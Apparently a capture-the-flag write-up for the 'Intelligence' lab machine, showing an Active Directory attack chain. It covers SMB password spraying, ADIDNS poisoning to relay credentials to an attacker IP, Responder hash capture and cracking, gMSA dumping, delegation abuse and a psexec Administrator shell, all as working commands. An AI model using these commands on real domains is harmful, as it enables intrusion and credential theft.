Enumeration
Nmap
From the Nmap scan, we can see that the target has various TCP ports open, including 53 (DNS), 80 (HTTP), 88 (Kerberos), 389 (LDAP), 445 (SMB), and 5985 (WinRM). It’s worth noting that the target is part of an Active Directory domain called intelligence.htb, and we can see a hostname for the domain controller as dc.intelligence.htb.
sudo nmap -sVC -Pn -T4 -p- 10.10.10.248
Updated the host names in the /etc/hosts file to correspond with the machine’s IP address:
SMB
Unable to connect with smbclient using null login.
smbclient -L 10.10.10.248 -N
HTTP
We can see a static web page by browsing the IIS web server at http://10.10.10.248/
In the documents directory, there are two PDF files named with the same naming scheme: year-month-date-upload.pdf.
Foothold
Using the following bash script we can download all PDF files starting from 2020-01-01:
d="2020-01-01"
while [ "$d" != $(date -I) ]; do
echo "http://10.10.10.248/Documents/$d-upload.pdf"
d=$(date -I -d "$d + 1 day")
done | xargs -n 1 -P 20 wget -q
After running the script, several PDF files were downloaded.
Retrieved potential usernames from the PDF files to a file “userlist”.
exiftool -Creator -csv *pdf | cut -d, -f2 | sort | uniq > userlist
Converted the pdf files to text files using pdftotext, and using head displayed the first line of each text file.
for f in *pdf; do pdftotext $f; done
head -n1 *txt
We found two interesting files “New Account Guide” and “Internal IT Update”.
From the file 2020-06-04-upload.txt we can see a password: NewIntelligenceCorpUser9876
cat 2020-{06-04,12-30}-upload.txt
Using the bash script below, we can try to list the smb shares of the target using the user list and the obtained password.
#!/bin/bash
password="NewIntelligenceCorpUser9876"
target="\\10.10.10.248"
workgroup="intelligence.htb"
while read user; do
output=$(smbclient -L $target -U $user%$password -W $workgroup 2>&1)
if [[ ! $output =~ "NT_STATUS_LOGON_FAILURE" && ! $output =~ "NT_STATUS_ACCOUNT_LOCKED_OUT" ]]; then
echo "[+] Successful login for: $user"
fi
done < userlist
This script reads through each user in the file userlist and tries to list shares using smbclient. It checks the output for signs of failed authentication, and if it doesn’t see them, it assumes the authentication was successful and then prints out that user’s name.
Running the script we can see that we got a successful login as the user Tiffany. Molina.
Successfully listed the SMB shares and connected to the share Users as the user Tiffany.Molina.
smbclient -L 10.10.10.248 -U Tiffany.Molina
smbclient \\\\10.10.10.248\\Users -U Tiffany.Molina
The user flag can be obtained from the directory: C:\Users\Tiffany.Molina\Desktop
Lateral Movement
From the share IT we can see a PowerShell script called downdetector.ps1.
smbclient \\10.10.10.248\IT -U Tiffany.Molina
get downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
The script downdetector.ps1 loops through DNS records and makes an authenticated request to any host with a name that starts with “web” to verify its status. We can take advantage of the permission granted to authenticated users by default to create any DNS record on the Active Directory Integrated DNS (ADIDNS) zone and add a new record that directs to our IP address.
To achieve this, we can use the dnstool.py script provided by krbrelayx:
python dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.10.10.248 -a add -r web1 -d 10.10.14.2 -t A
Started Responder to intercept the request.
sudo responder -I tun0
In Responder got the password hash of the user Ted.Graves.
Copied the hash to a file hash.txt.
Using John the Ripper, successfully cracked the password: Mr.Teddy
john -w=/usr/share/wordlists/rockyou.txt hash.txt
Privilege Escalation
Using the credentials of the user Ted.Graves collected data from the domain using bloodhound-python.
bloodhound-python -ns 10.10.10.248 -d intelligence.htb -dc dc.intelligence.htb -u Ted.Graves -p Mr.Teddy
In Bloodhound marked users Tiffany.Molina and Ted.Graves as owned, and marked users svc_int and administrator as high-value targets.
It appears that Ted.Graves is part of the ITSUPPORT group, which has ReadGMSAPassword privileges on svc_int. As a result, svc_int can delegate rights to the Domain Controller.
Using the tool gMSADumper we can get the password hash of the service account svc_int.
python gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248
To obtain a TGT for the Administrator user, we must synchronize our time with the target host. Failure to do so will result in an error message indicating that the clock skew is too great. This is due to the time-sensitive nature of Kerberos, and the fact that there is a 7-hour time difference between our host and the target host, as determined through our Nmap scan.
To sync our time with the target host, we need to first deactivate automatic time synchronization by running the command timedatectl set-ntp 0
. After that, we can execute sudo ntpdate -s intelligence.htb
to initiate the synchronization process.
sudo timedatectl set-ntp 0
date && sudo ntpdate -s intelligence.htb && date
Successfully got a TGT to a file called administrator.ccache
python getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :87c12d4a0641b2b17fb5620cc2db2ca8
Got a shell as the user administrator with psexec using the acquired ticket.
export KRB5CCNAME=Administrator.ccache
psexec.py -dc-ip dc.intelligence.htb -k "intelligence.htb/Administrator@dc.intelligence.htb" -no-pass
The root flag can be obtained from the directory: C:\Users\Administrator\Desktop